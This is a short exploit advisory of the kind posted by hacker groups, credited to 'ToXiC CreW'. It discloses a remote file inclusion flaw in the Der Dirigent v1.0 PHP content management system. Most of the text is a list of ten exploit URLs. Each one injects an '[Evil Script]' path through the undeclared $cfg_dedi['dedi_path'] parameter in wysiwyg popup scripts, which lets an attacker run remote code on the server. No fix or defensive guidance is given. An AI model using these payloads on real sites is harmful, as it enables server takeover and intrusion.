###### ToXiC ######################### # # Der dirigent: Remote File Inclusion by ToXiC CreW # # ToXic Security Italian CreW # BuG FounD by Drago84 # # Application Affect: # Der_dirigent # # # Source Code: # http://www.der-dirigent.de/downloads/der_dirigent_v1.0.zip # # # Page: # insert_line.php # insert_page.php # find.php # fullscreen.php # changecase.php # insert_link.php # insert_marquee.php # insert_table.php # table_cellprop.php # table_prop.php # table_rowprop.php # # # Problem: # # $cfg_dedi['dedi_path'] Not Declare # # Dir : # /backend/external/wysiwyg/popups/ # # # # # # # ExPloit : # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_li ne.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_pa ge.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/find.php? cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/fullscree n.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/changecas e.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_li nk.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_ta ble.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_cel lprop.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_pro p.php?cfg_dedi['dedi_path']=[Evil Script] # http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_row prop.php?cfg_dedi['dedi_path']=[Evil Script] # # # # GrEatZ All Member of ToXiC, Str0ke # # # FUCK #Sonic # ###### ToXiC #########